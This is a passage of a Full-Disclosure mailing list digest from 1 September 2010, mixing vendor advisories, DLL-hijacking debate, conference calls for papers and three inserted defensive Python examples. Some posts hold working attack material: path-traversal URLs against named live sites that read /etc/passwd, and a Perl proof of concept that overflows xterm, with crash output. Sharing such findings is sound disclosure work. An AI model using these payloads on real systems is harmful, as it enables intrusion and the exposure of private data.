[Full-disclosure] Unusable Security [was: Re: DLL hijacking with Autorun on a USB drive], also proxy in the middle detection / destruction

2010-09-01 Thread coderman
On Tue, Aug 31, 2010 at 4:26 PM, coderman coder...@gmail.com wrote:
 ... it would have been nice to
 collect stats from the get go. then he might have shown only a 99.72%
 success rate.

on this subject, transparent MITM tools like MAORYYY!!*
and friends often succumb to resource exhaustion attacks. i've been
looking for something to accomplish the following while requiring the
least amount of resources on the host. (the point is to leverage as
little of your resources to exhaust the resources of the transparent
monkey in the middle.) unfortunately this kills any NAT router in your
egress path but who needs those anyway?

ideally these packet generators would be layers on top of scapy,
another indispensable utility:

attached to a raw ethernet / datagram device i need:
a. lightweight TCP state machine for connection tracking / file
descriptor exhaustion
b. lightweight SSL/TLS state machine and weak key generation for SSL
session exhaustion

how small can you get per TCP connection overhead sufficient to
maintain state assuming fixed pool of client IPs to random
destinations?
64bytes / conn?  16bytes? less?

how small can you get per TCP+SSL connection overhead sufficient to
maintain state assuming fixed pool of client IPs to random
destinations and server side certificates? (weak keys, key derivation
functions, other memory conserving implementation tricks encouraged :)
0.25kB/sess.?  48B/sess?


* kudos guys; i like this tool. a little tweaking to protocol/base.py
for full s2c response buffering, de-chunking, mangling and it works
nicely for a wide range of needs. ++

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] VMSA-2010-0013

2010-09-01 Thread VMware Security Team
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
   VMware Security Advisory

Advisory ID:       VMSA-2010-0013
Synopsis:          VMware ESX third party updates for Service Console
Issue date:        2010-08-31
Updated on:        2010-08-31 (initial release of advisory)
CVE numbers:       CVE-2005-4268 CVE-2010-0624 CVE-2010-2063
                   CVE-2010-1321 CVE-2010-1168 CVE-2010-1447
- 

1. Summary

   ESX 3.5 Console OS (COS) updates for COS packages perl, krb5, samba,
   tar, and cpio.

2. Relevant releases

   VMware ESX 3.5 without patches ESX350-201008405-SG,
   ESX350-201008407-SG, ESX350-201008410-SG, ESX350-201008411-SG,
   ESX350-201008412-SG.

   Notes:
   Effective May 2010, VMware's patch and update release program during
   Extended Support will be continued with the condition that all
   subsequent patch and update releases will be based on the latest
   baseline release version as of May 2010 (i.e. ESX 3.0.3 Update 1,
   ESX 3.5 Update 5, and VirtualCenter 2.5 Update 6). Refer to section
   End of Product Availability FAQs at
   http://www.vmware.com/support/policies/lifecycle/vi/faq.html for
   details.

   Extended support for ESX 3.0.3 ends on 2011-12-10.  Users should plan
   to upgrade to at least ESX 3.5 and preferably to the newest release
   available.

3. Problem Description

 a. Service Console update for cpio

The service console package cpio is updated to version 2.5-6.RHEL3.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2005-4268 and CVE-2010-0624 to the issues
addressed in this update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.  

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      affected, patch pending
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      ESX350-201008405-SG
ESX            3.0.3     ESX      affected, patch pending

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 b. Service Console update for tar

The service console package tar is updated to version
1.13.25-16.RHEL3

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-0624 to the issue addressed in this
update.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.  

VMware         Product   Running  Replace with/
Product        Version   on       Apply Patch
=============  ========  =======  =================
VirtualCenter  any       Windows  not affected

hosted *       any       any      not affected

ESXi           any       ESXi     not affected

ESX            4.1       ESX      affected, patch pending
ESX            4.0       ESX      affected, patch pending
ESX            3.5       ESX      ESX350-201008407-SG
ESX            3.0.3     ESX      affected, patch pending

  * hosted products are VMware Workstation, Player, ACE, Server, Fusion.

 c. Service Console update for samba

The service console packages for samba are updated to version
samba-3.0.9-1.3E.17vmw, samba-client-3.0.9-1.3E.17vmw and
samba-common-3.0.9-1.3E.17vmw.

The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-2063 to the issue addressed in this
update.

Note:
The issue mentioned above is present in the Samba server (smbd) and
is not present in the Samba client or Samba common packages.

To determine if your system has Samba server installed do a
'rpm -q samba'.

The following lists when the Samba server is installed on the ESX
service console:

- ESX 4.0, ESX 4.1
  The Samba server is not present on ESX 4.0 and ESX 4.1.

- ESX 3.5
  The Samba server is present if an earlier patch for Samba has been
  installed.

- ESX 3.0.3
  The Samba server is present if ESX 3.0.3 was upgraded from an
  earlier version of ESX 3 and a Samba patch was installed on that
  version.

The Samba server is not needed to operate the service console and
can be disabled without loss of functionality to the service
console.

Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.  

VMware Product   Running  Replace 


Re: [Full-disclosure] Orange Spain disclosing user phone number

2010-09-01 Thread xufi .
Orange Spain has updated its GW configuration and it's not adding the
user MSISDN by default anymore.
Another example that responsible disclosure is not always enough.
Thanks for helping fix this
@xuf_


On Mon, Aug 30, 2010 at 4:48 PM, B1towel b...@b1towel.com wrote:
 It would be funny to see advertisers send targeted SMS ads using this. I bet
 that the advertisers of web sites that participate in iframe ads would also
 get this information, assuming the Phone would load up iframe ads.
 I think the provider should fix this, because if someone developed an
 exploit similar to the one that was able to compromise the iPhone a while
 back just by sending a maliciously formed SMS message, your phone could be
 compromised just by going to a website where this information is sent to the
 web server.
 I know this is pretty obvious, just my 2 cents.
 On Aug 30, 2010, at 7:00 AM, full-disclosure-requ...@lists.grok.org.uk
 wrote:


 Message: 2
 Date: Sun, 29 Aug 2010 21:09:50 +0200
 From: xufi . xuf...@gmail.com
 Subject: [Full-disclosure] Orange Spain disclosing user phone number
 To: full-disclosure@lists.grok.org.uk
 Message-ID:
 aanlktinky8usakpd0gg5uosesdfene8bhjaa-oepk...@mail.gmail.com
 Content-Type: text/plain; charset=ISO-8859-1

 Hi,
 Doing an assessment on mobile GWs I found that Orange Spain is adding
 the user MSISDN in any HTTP request sent in its network. That means
 that it is really simple to get the user phone number from an Orange Spain
 user. On one hand, I saw that Orange Spain uses the header
 x-up-calling-line-id to add a user temporary ID that changes every 24h
 but I also found that in any HTTP request they will add the user phone
 number in the header X-Network-info. In particular the HTTP header
 looks as follows:

 X-Network-info: CSD,34x,unsecured

 where x is the user MSISDN



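For a site operator on the receiving end of the headers described in this thread, the following added example (not part of the original posts) scrubs them before a request is logged or passed on. The digit-length rule, the redaction marker and the sample requests are assumptions constructed for illustration.

```python
import re

# A comma-separated field made only of digits, 8 to 15 long (E.164 caps a
# number at 15 digits). Assumption: the MSISDN arrives as bare digits, as in
# the "CSD,34x,unsecured" shape quoted in the post.
MSISDN_FIELD = re.compile(r"^\+?\d{8,15}$")

# Header named in the post as carrying a per-subscriber ID (rotated every 24h).
SUBSCRIBER_ID_HEADERS = {"x-up-calling-line-id"}

REDACTED = "[msisdn-redacted]"


def scrub_headers(headers):
    """Return (clean_headers, findings) for one request's header dict.

    Subscriber-ID headers are dropped; in any X-* header a field that looks
    like an MSISDN is replaced, so the bearer and security flags survive.
    """
    clean, findings = {}, []
    for name, value in headers.items():
        lname = name.lower()
        if lname in SUBSCRIBER_ID_HEADERS:
            findings.append((name, "subscriber-id"))
            continue
        if lname.startswith("x-"):
            fields = [f.strip() for f in value.split(",")]
            redacted = [REDACTED if MSISDN_FIELD.match(f) else f for f in fields]
            if redacted != fields:
                findings.append((name, "msisdn"))
                value = ",".join(redacted)
        clean[name] = value
    return clean, findings


def exposure_summary(requests):
    """Count, per header name, how many requests exposed subscriber data."""
    counts = {}
    for headers in requests:
        _, findings = scrub_headers(headers)
        for name, _kind in findings:
            counts[name.lower()] = counts.get(name.lower(), 0) + 1
    return counts


# Constructed sample requests; the phone number and ID are made up.
SAMPLE_REQUESTS = [
    {   # request that crossed a gateway injecting subscriber data
        "Host": "www.example.test",
        "User-Agent": "ExampleMobileBrowser/1.0",
        "X-Network-info": "CSD,34600000000,unsecured",
        "x-up-calling-line-id": "a1b2c3d4e5",
        "X-Forwarded-For": "192.0.2.10",
    },
    {   # ordinary request with nothing to scrub
        "Host": "www.example.test",
        "User-Agent": "ExampleDesktopBrowser/1.0",
        "X-Forwarded-For": "198.51.100.23",
    },
]

if __name__ == "__main__":
    for request in SAMPLE_REQUESTS:
        print(scrub_headers(request))
    print(exposure_summary(SAMPLE_REQUESTS))
```

A purely numeric field in some unrelated X-* header (a long request counter, for instance) would also be redacted, which is the safe direction for a log scrubber.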


[Full-disclosure] Mac OS X Mail parental controls vulnerability

2010-09-01 Thread Jonathan Kamens
The parental controls built into the Mac OS X Mail client can be easily
bypassed by anyone who knows the email address of the child and his/her
parent. The Mail client can be fooled into adding any address to the child's
whitelist (i.e., the list of addresses with whom the child is allowed to
correspond), as if the parent had approved the address, without his/her
knowledge or consent. This vulnerability can be taken advantage of by the
child or by any third party anywhere on the Internet.

 

I have reported this vulnerability to Apple, and they have declined to
assign a CVE ID for it, disclose it to the public, or indicate a time-line
for when it will be disclosed or fixed.

For more information:

http://blog.kamens.us/2010/08/03/mac-os-x-mail-parental-controls-vulnerability/


[Full-disclosure] Gawker/Kotaku Local File Inclusion

2010-09-01 Thread kotaku_disclosure
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Thought I'd share this...found an LFI on gawker which is on the
same server as Kotaku and other sites part of their 'network'

http://kotaku.com/assets/minify.php?fsid=dfdsftype=sadssb=../../../../../../../../../../etc/passwd%00

^ works for gawker as well, just replace the name

Full source code of the offending page http://pastebin.com/eWuExuke

newline characters are stripped out however...

This was the original 'LFI' I used to get the source code
http://gawker.com/assets/minify.php?base=/assets/base.v9/css/../../lib/jsmin.php%00files=asfdf.css

It seems to be fixed today though. But the other LFI above still
works :D

AFAIK it's not exploitable beyond the obvious information
disclosures, as they don't allow read access to logfiles, and
/proc/self/environ is unreadable. Still amusing to find this on
there.
-BEGIN PGP SIGNATURE-
Charset: UTF8
Version: Hush 3.0
Note: This signature can be verified at https://www.hushtools.com/verify

wpwEAQMCAAYFAkx9aS4ACgkQ3nE+T38NspftqgP+N5mPHgA/n5JzGtekqQv6HpbcFS/W
iL4xh7OpfZISj7GXQJZjv40muLEkQFEgEZmNnX+Mw5y8ByLNqkDjbEULdLPe3XjB4TEy
TrkzY2jRbvyO+KWzBs1jFFrAAbdK+UhYt94ELX/optiusAUWI3ZoWsh1umateF67sLJ0
RlpDn5Y=
=ryBU
-END PGP SIGNATURE-
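
The two request shapes in this post (a `../` chain and a `%00`-terminated path in front of a harmless-looking file name) are what a file-serving endpoint has to reject. The following is an added example, not the site's code or its fix: a resolver for an asset endpoint that takes `base` and `files` style parameters, written in Python, with the directory layout, the allowed extensions and all names assumed for illustration.

```python
import os
import tempfile

# Assumption: the endpoint is only ever meant to serve static assets.
ALLOWED_EXTENSIONS = {".css", ".js"}


class RejectedPath(ValueError):
    """Raised when a request parameter fails validation."""


def resolve_asset(asset_root, base, filename):
    """Return the real path of an asset under asset_root or raise RejectedPath."""
    for value in (base, filename):
        # A decoded %00 ends the string early in C-level file APIs, so what is
        # validated and what is opened can differ. Refuse it outright.
        if "\x00" in value:
            raise RejectedPath("NUL byte in parameter")
    root = os.path.realpath(asset_root)
    # realpath collapses ../ sequences and resolves symlinks, so every later
    # check runs on the path that would actually be opened.
    candidate = os.path.realpath(os.path.join(root, base.lstrip("/"), filename))
    if os.path.commonpath([root, candidate]) != root:
        raise RejectedPath("path escapes asset root")
    # Check the extension of the resolved path, not of the raw parameter.
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        raise RejectedPath("extension not allowed")
    if not os.path.isfile(candidate):
        raise RejectedPath("no such asset")
    return candidate


def check(asset_root, base, filename):
    """Return 'served' or the rejection reason, for logging and testing."""
    try:
        resolve_asset(asset_root, base, filename)
        return "served"
    except RejectedPath as exc:
        return str(exc)


def build_sample_tree():
    """Create a constructed directory tree and return its asset root."""
    top = tempfile.mkdtemp(prefix="minify-demo-")
    for rel in ("assets/base.v9/css/site.css",
                "assets/base.v9/helper.php",
                "lib/jsmin.php"):
        path = os.path.join(top, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as handle:
            handle.write("/* constructed sample */\n")
    return os.path.join(top, "assets")


if __name__ == "__main__":
    root = build_sample_tree()
    cases = [
        ("/base.v9/css", "site.css"),
        ("/base.v9/css/../../../lib/jsmin.php\x00", "asfdf.css"),
        ("", "../../../../../etc/passwd\x00"),
        ("/base.v9/css/../../../lib", "jsmin.php"),
        ("/base.v9", "helper.php"),
    ]
    for base, name in cases:
        print(repr(base), repr(name), "->", check(root, base, name))
```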



[Full-disclosure] Tortoise SVN DLL Hijacking Vulnerability

2010-09-01 Thread Nikhil Mittal
1. Overview
Tortoise SVN is vulnerable to Windows DLL Hijacking Vulnerability. Version 
1.6.10, Build 19898 (latest available on 30th August 2010 was tested) is 
vulnerable.

2. Vulnerability Description
Tortoise SVN passes an insufficiently qualified path for the dll dwmapi.dll 
while opening a file using TortoiseProc.

Timeline
30-08-2010 - Discovered Vulnerability
30-08-2010 - Informed the developers
30-08-2010 - Response from developers (in 25  minutes)
31-08-2010 - Disclosure


The Common Vulnerabilities and Exposures (CVE) project has assigned the name 
CVE-2010-3199 to this issue. This is a candidate for  inclusion in the CVE list 
(http://cve.mitre.org), which standardizes names for security problems.


3. Exploitability
A file extension needs to be registered with TortoiseProc to exploit the 
vulnerability and a crafted file needs to be opened from a network share.

4. Versions Affected
TortoiseSVN 1.6.10, Build 19898 and lower.

5. POC/Exploit
Done with Webdav hijack module of Metasploit

6. Impact
Remote Code Execution in context of TortoiseProc

7. References
http://tortoisesvn.tigris.org/ds/viewMessage.do?dsForumId=4061dsMessageId=2653163

8. Solution
Fix awaited from Microsoft. Meanwhile workarounds can be found here 
http://www.microsoft.com/technet/security/advisory/2269637.mspx

---
Nikhil Mittal






[Full-disclosure] Rooted CON 2011 - Call for Papers

2010-09-01 Thread Román Ramírez
Rooted CON 2011 - Call for Papers

-=] About Rooted CON

Rooted CON is a security congress which will be held in Madrid (Spain)
from 3 to 5 March 2011, with a spectrum of participants ranging from
students to state forces and secret services, through professionals of
the security market, lawyers, or even technology enthusiasts (and others).

-=] Type of Presentations

The congress accepts two kinds of presentations:

- Fast talks: 20 minutes.
- Normal talks: 50 minutes.

Depending on the received proposals, the quantities of each type to
confirm will be determined; there is no established schedule
format for the congress, but the agenda is structured according to the demand
and supply that is received.

-=] Topics

Topics and lectures considered interesting, but not exclusively limited to:

- Hacking, cracking, phreaking, virii, WiFi, VoIP, GSM...
- Reverse engineering, debugging, hooking, fuzzing, exploiting,...
- Innovative defensive and offensive techniques and tools.
- Security in the cloud, security and hacking inside virtual
environments, products and services in the cloud, ...
- Cryptography, steganography and subliminal channel techniques, ...
- Forensics, researching and anti-forensics techniques.
- Networking, layer 2 and 3 protocols and hacking, encapsulation, ...

We will especially appreciate issues and proposals which were not
submitted in the previous edition of Rooted CON.

-=] Procedure for submitting proposals

Only proposals received through the registration form will be accepted,
which can be accessed at the URL:

- https://www.rootedcon.es/cfp2011-esp/ (spanish)
- https://www.rootedcon.es/cfp2011-eng/ (english)

Any other form, media or communication other than through the
above-mentioned form is not considered for the purpose of submitted
presentations and, of course, will not be evaluated.

-=] Schedule

- 01 Sept 2010 - CFP opens
- 31 Dec 2010 - CFP closes.
- Jan 2011 - Speakers selection.
- Feb 2011 - Final paper and presentations material submitted
- 3-5 March 2011 - Rooted CON 2011

-=] Speaker privileges

Every speaker will be given the following benefits:

- Free dinner with the other speakers night before the congress.
- Free accommodation
- Travel expenses
- Free access to the congress
- Free party tickets/drinks

-=] Sponsors and partners

Rooted CON is always looking for quality sponsors for the organization
of the congress, so if you or your company is interested, please contact us:

sponsors-AT-rootedcon.es

Any help, ideas, proposals or collaborations you send us will be
considered and valued by the organization: we depend on you to make this
congress one of the most original.

-=] Contact us

Any ideas, suggestions or questions:

info-AT-rootedcon.es

-=] Our links

- Web: http://www.rootedcon.es/eng/
- Twitter: @rootedcon
- Facebook: http://bit.ly/fbookrooted
- LinkedIn: http://bit.ly/linkedinrooted
- Rooted mailing-list (spanish): rooted...@listas.rooted.es



[Full-disclosure] Month of Abysssec Undisclosed Bugs - Day 1

2010-09-01 Thread muts
Hi Lists, 

The Abysssec Security Team has started its Month of Abysssec undisclosed
bugs (MOAUB). 
During this month, Abysssec will release a collection of 0days, web
application vulnerabilities, and detailed binary analysis (and PoCs) for
recently released advisories by vendors such as Microsoft, Mozilla, Sun,
Apple, Adobe, HP, Novell, etc.
The exploits, papers and PoCs will be featured on the Exploit-Database
(http://www.exploit-db.com), averaging one 0day and one binary analysis a
day. 
Get your hard-hats on, your VMs and debugging tools organized - it's going
to be an intensive ride.

Posted today - MOAUB Day 1:

http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/
http://www.exploit-db.com/moaub-1-cpanel-php-restriction-bypass-vulnerability/

Enjoy, 

Abysssec and the Exploit Database Team


Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive

2010-09-01 Thread Charles Morris
On Tue, Aug 31, 2010 at 7:03 PM, Dan Kaminsky d...@doxpara.com wrote:




 On Aug 31, 2010, at 2:20 PM, Charles Morris cmor...@cs.odu.edu wrote:

 On Tue, Aug 31, 2010 at 5:15 PM, Dan Kaminsky d...@doxpara.com wrote:


 Again, the clicker can't differentiate word (the document) from word (the
 executable).  The clicker also can't differentiate word (the document) from
 word (the code equivalent script).

 The security model people keep presuming exists, doesn't.

 Even the situation whereby a dll is dropped into a directory of documents --
 the closest to a real exploit path there is -- all those docs can be
 repacked into executables.


 What?

 I can differentiate my coolProposal.doc from msword.exe just fine..


 Uh huh. Here, let me go ahead and create 2010 Quarterly Numbers.ppt.exe with
 a changed icon, and see what you notice.


Mr. Szabo has already slapped your wrist for such undeserved arrogance.

And yeah, I find it a joke that you think that .ppt.exe isn't pretty
damn obvious.

I might have fallen for that when I was 9, but I haven't had a problem
with a windows box in years.

I will admit, at 3AM when I've been working for 18 hours and awake for
36, it is possible that I may double-click
such a malicious file and then immediately think OH shit and rebuild.

I know what we can do, we can repackage the Hey watch out for badguys
masquerading as innocent files
that everybody already knows about, contact CERT and negotiate a fix
between major vendors (Hey this isn't just a MS vulnerability
right??), then give a talk at blackhat to establish our fame, but now
that I think about it.. that would be rude to the people who have been
complaining about this since 1999.


 If your statement is that the windows defaults should be changed,
 including the hide extensions default, then I wholeheartedly agree
 as I detailed in my first post. It's the first thing I turn off.

 Many people who think the same way have considered that a
 vulnerability in windows for years, I wouldn't consider it part of
 the DLL Hijacking fiasco.

 Imagine if the browser lock meant arbitrary code could run.

 I find your faith in small collections of pixels hilarious.


Imagine if the keyboard LED meant arbitrary code could run!!

What? I don't even understand what you are getting at. This has
nothing to do with faith in icons.

My statement was that windows defaults arguably represent a
vulnerability in the GUI
by making proposal.doc indistinguishable from proposal.doc.exe with
a crafted icon,
when you are encouraged to double-click the icons through the GUI, and
when doc files
are supposed to be innocent to open. I was also stating the fact that
this vulnerability
should be addressed outside of the scope of the DLL Hijacking mess.

Cheers,
Charles



[Full-disclosure] nullcon Goa dwitiya (2.0) Call For Papers

2010-09-01 Thread nullcon
nullcon Dwitiya (2.0)
The Jugaad(hacking) Conference

nullcon is an initiative by null - The open security community.

Website:
http://nullcon.net

Calling all Jugaadus(hackers)
It's the time of the year when we welcome research done by the
community as paper submissions for nullcon.
So, sip your coffee, dust your debuggers, fire your tools, challenge
your grey cells and shoot us an email.

Tracks:
---
- Bakkar: 1 Hr Talks
- Tez:  5-30 min Talks
- Karyashala:   2-4 Hrs Workshop
- Desi Jugaad (Local Hack): 1 Hr

Submission Topics:
--
1. One of the topics of interest to us is Desi Jugaad(Local Hack)
and has a separate track of its own. Submissions can be any kind of
local hacks that you have worked on (hints: electronic/mechanical
meters, automobile hacking, Hardware, mobile phones, lock-picking,
bypassing procedures and processes, etc, Be creative  :-D)

2. The topics pertaining to security and Hacking in the following
domains(but not limited to)
- Hardware (ex: RFID, Magnetic Strips, Card Readers, Mobile Devices,
Electronic Devices)
- Tools (open source)
- Programming/Software Development
- Networks
- Information Warfare
- Botnets, Malware
- Web
- New attack vectors
- Mobile, VOIP and Telecom
- VM
- Cloud
- Critical Infrastructure
- Satellite
- Wireless
- Forensics
- Cyber Laws

Submission Format:
--
Email the cfp to: cfp(_at_)nullcon.net
Subject should be: CFP Dwitiya Paper Title
Email Body:
- Name
- Handle
- Track  Time required
- Paper Title
- Country of residence
- Organization
- Contact no.
- Have you presented/submitted this talk at any other conference(s)?
- Why do you think your paper is different/innovative?
- Brief Profile ( = 500 Words)
- Paper Abstract ( = 3000 Words)

NOTE: The Abstract should clearly mention the techniques and hacks in
detail and merely mentioning that it works will not help in
understanding the research to its full extent.


Important Dates:
--
CFP End Date: 30th November 2010
Speakers List Online: 10th December 2010
Conference Dates: 25th - 26th February 2011


Venue:

Goa, India
(Exact Venue TBD)


Speaker Benefits:

For Tracks Bakkar, Desi Jugaad and Karyashala
1. Free Accommodation for 3 nights
2. Travel (One way or Return depending on the Sponsorships :-) )
3. Free access to the conference.
4. Invitation to Mehfil-E-Mausiqi (null party)

For Track Tez
1. Free access to the conference.
2. Invitation to Mehfil-E-Mausiqi (null party)

* Only one speaker will be eligible for the benefits in case there are
two or more speakers for a talk.



[Full-disclosure] Online Binary Planting Exposure Test

2010-09-01 Thread ACROS Lists

ACROS Security has made the Online Binary Planting Exposure Test publicly accessible
for the benefit of all Windows users. This test should make it easy for users and
administrators to assess their exposure to binary planting attacks originating from
the Internet.

URL: http://www.binaryplanting.com/test.htm

Note that this test is NOT meant to answer whether you're vulnerable (at this point
where so many binary planting vulnerabilities exist out there you certainly are
vulnerable if you're on a Windows system). Rather, the test is meant to determine
whether your computer or network can be attacked from the Internet (using any one of
the known or unknown binary planting bugs).

You should also know that any network-based countermeasure (such as blocking SMB and
WebDAV at the perimeter) will stop protecting you when you connect your computer to
another network, such as a hotel-provided or public wireless network. Running the
test in various setups you're using might therefore be a good idea.

Additional information here:
http://blog.acrossecurity.com/2010/08/online-binary-planting-exposure-test.html.

Regards,
Mitja


Mitja Kolsek
CEOCTO

ACROS, d.o.o.
Makedonska ulica 113
SI - 2000 Maribor, Slovenia
tel: +386 2 3000 280
fax: +386 2 3000 282
web: http://www.acrossecurity.com

ACROS Security: Finding Your Digital Vulnerabilities Before Others Do
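
Because perimeter blocking stops helping once a machine leaves the network, the host itself is the place to watch for the loads that both this post and the TortoiseSVN advisory earlier on the page describe: a DLL such as dwmapi.dll arriving from a share instead of the system directory. The following is an added example, not ACROS's test or any vendor's tool. It triages image-load records whose field names follow Sysmon Event ID 7 (`Image`, `ImageLoaded`); the events, hosts, paths and the short DLL name list are constructed assumptions.

```python
import ntpath

SYSTEM_DIRS = (r"C:\Windows\System32", r"C:\Windows\SysWOW64", r"C:\Windows\WinSxS")

# Small sample of DLL names that ship in the system directory. A real
# deployment would build this set from a baseline of its own hosts.
SYSTEM_DLL_NAMES = {"dwmapi.dll", "version.dll", "uxtheme.dll"}


def norm(path):
    """Case-fold and normalise a Windows path (works on any platform)."""
    return ntpath.normcase(ntpath.normpath(path))


def is_remote(path):
    """True for UNC paths; local device paths such as \\\\?\\C:\\ are excluded.

    A mapped drive letter cannot be recognised from the path alone.
    """
    p = norm(path)
    if p.startswith("\\\\?\\unc\\"):
        return True
    if p.startswith(("\\\\?\\", "\\\\.\\")):
        return False
    return p.startswith("\\\\")


def is_webdav(path):
    """Heuristic: the WebDAV redirector uses \\\\host@SSL\\... or a DavWWWRoot share."""
    parts = norm(path).split("\\")
    host = parts[2] if len(parts) > 2 else ""
    return "@" in host or "davwwwroot" in parts


def in_directory(path, directory):
    return norm(path).startswith(norm(directory).rstrip("\\") + "\\")


def triage(event):
    """Return a verdict string for a suspicious load, or None."""
    loaded = event["ImageLoaded"]
    if is_remote(loaded):
        return "dll-from-webdav-share" if is_webdav(loaded) else "dll-from-smb-share"
    name = ntpath.basename(norm(loaded))
    if name in SYSTEM_DLL_NAMES and not any(in_directory(loaded, d) for d in SYSTEM_DIRS):
        return "system-dll-name-outside-system-dir"
    return None


def find_planted_loads(events):
    """Return (ImageLoaded, verdict) for every event that needs a look."""
    hits = []
    for event in events:
        verdict = triage(event)
        if verdict is not None:
            hits.append((event["ImageLoaded"], verdict))
    return hits


PROC = r"C:\Program Files\TortoiseSVN\bin\TortoiseProc.exe"  # constructed sample path

# Constructed sample events; addresses are from documentation ranges.
SAMPLE_EVENTS = [
    {"Image": PROC, "ImageLoaded": r"C:\Windows\System32\dwmapi.dll"},
    {"Image": PROC, "ImageLoaded": r"\\198.51.100.7\docs\dwmapi.dll"},
    {"Image": PROC, "ImageLoaded": r"\\files.example.test@SSL\DavWWWRoot\docs\dwmapi.dll"},
    {"Image": PROC, "ImageLoaded": r"C:\Program Files\TortoiseSVN\bin\example_plugin.dll"},
    {"Image": PROC, "ImageLoaded": r"C:\Users\alice\Documents\project\dwmapi.dll"},
]

if __name__ == "__main__":
    for loaded, verdict in find_planted_loads(SAMPLE_EVENTS):
        print(verdict, loaded)
```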
 



[Full-disclosure] [SecurityArchitect-008]: Xterm Local Buffer Overflow Vulnerability

2010-09-01 Thread musashi karak0rsan

Product: Xterm
Vulnerability: Buffer Overflow (heap-based)
Credits: Celil Ünüver from SecurityArchitect.Org
Tested on: Ubuntu 10.04 and xterm(256) version
Details:
Xterm's -fw, -fwb, -fb command line options cause an overflow while 
writing a long argument.
PoC:
# Contact: www.securityarchitect.org
$file = "A" x 500;            # long string used as the option's argument
$print = "xterm -fw $file";   # command line passed to the shell
system $print;
Results:
p...@ubuntu:~/Masaüstü$ perl xterm.pl
*** glibc detected *** xterm: munmap_chunk(): invalid pointer: 0x09f593a4 ***
=== Backtrace: =
/lib/tls/i686/cmov/libc.so.6(+0x6b591)[0x2fd591]
/lib/tls/i686/cmov/libc.so.6(+0x6c80e)[0x2fe80e]
Greets: hellcode

[Full-disclosure] LDAP NULL Bind being picked up, making non PCI compliant

2010-09-01 Thread Jason Nada

We recently ran a scan against our Exchange servers and got the error that our 
server was vulnerable to an LDAP NULL BIND overflow. This vulnerability is now 
making our network noncompliant with PCI and we are having trouble with a way to fix 
the problem.

I know we can't deny or shut down LDAP as it is needed by RootDSE, but we 
need to find a fix or way to stop the LDAP from being picked up as vulnerable. 
The server is running Windows 2008, and from what I read, Win 2008 will 
show the server as vulnerable but doesn't really pose any kind of threat? Is 
this true? Any information will help! Thanks!

Re: [Full-disclosure] Online Binary Planting Exposure Test

2010-09-01 Thread YGN Ethical Hacker Group
Very Cool! :)
I think/wish there will be more demos.



Re: [Full-disclosure] LDAP NULL Bind being picked up, making non PCI compliant

2010-09-01 Thread Valdis . Kletnieks
On Wed, 01 Sep 2010 10:30:55 EDT, Jason Nada said:

 We recently ran a scan against our Exchange servers and got the error that
 our server was vulnerable to an LDAP NULL BIND overflow. This vulnerability
 is now making our network noncompliant with PCI and we are having trouble with a
 way to fix the problem.

Have you talked to the outside auditors who are doing the PCI compliance test,
and see what you can do with compensating controls? Firewall off the servers
so LDAP can only get to/from them from your official machines, etc?



Re: [Full-disclosure] Online Binary Planting Exposure Test

2010-09-01 Thread coderman
On Wed, Sep 1, 2010 at 4:20 AM, ACROS Lists li...@acros.si wrote:
...
 Note that this test is NOT meant to answer whether you're vulnerable (at this point
 where so many binary planting vulnerabilities exist out there you certainly are
 vulnerable if you're on a Windows system). Rather, the test is meant to determine
 whether your computer or network can be attacked from the Internet (using any one of
 the known or unknown binary planting bugs).

 You should also know that any network-based countermeasure (such as blocking SMB and
 WebDAV at the perimeter) will stop protecting you when you connect your computer to
 another network, such as a hotel-provided or public wireless network. Running the
 test in various setups you're using might therefore be a good idea.


zero configuration networking services on local wireless, wired
networks are a great resource among this class; you'll need a local
view to probe unless you add an endpoint local java scanner applet to
that page. ... /druthers



[Full-disclosure] [ MDVSA-2010:168 ] openssl

2010-09-01 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2010:168
 http://www.mandriva.com/security/
 ___

 Package : openssl
 Date: September 1, 2010
 Affected: 2010.1
 ___

 Problem Description:

 A vulnerability has been found and corrected in openssl:
 
 Double free vulnerability in the ssl3_get_key_exchange function in
 the OpenSSL client (ssl/s3_clnt.c) in OpenSSL 1.0.0a, 0.9.8, 0.9.7,
 and possibly other versions, when using ECDH, allows context-dependent
 attackers to cause a denial of service (crash) and possibly execute
 arbitrary code via a crafted private key with an invalid prime.  NOTE:
 some sources refer to this as a use-after-free issue (CVE-2010-2939).
 
 The updated packages have been patched to correct this issue.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2939
 ___

 Updated Packages:

 ___

 To upgrade automatically use MandrivaUpdate or urpmi.  The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.  You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 ___

 Type Bits/KeyID Date   User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  security*mandriva.com



Re: [Full-disclosure] DLL hijacking with Autorun on a USB drive

2010-09-01 Thread matt
> And yeah, I find it a joke that you think that .ppt.exe isn't pretty
> damn obvious.
>
> I might have fallen for that when I was 9, but I haven't had a problem
> with a windows box in years.
>
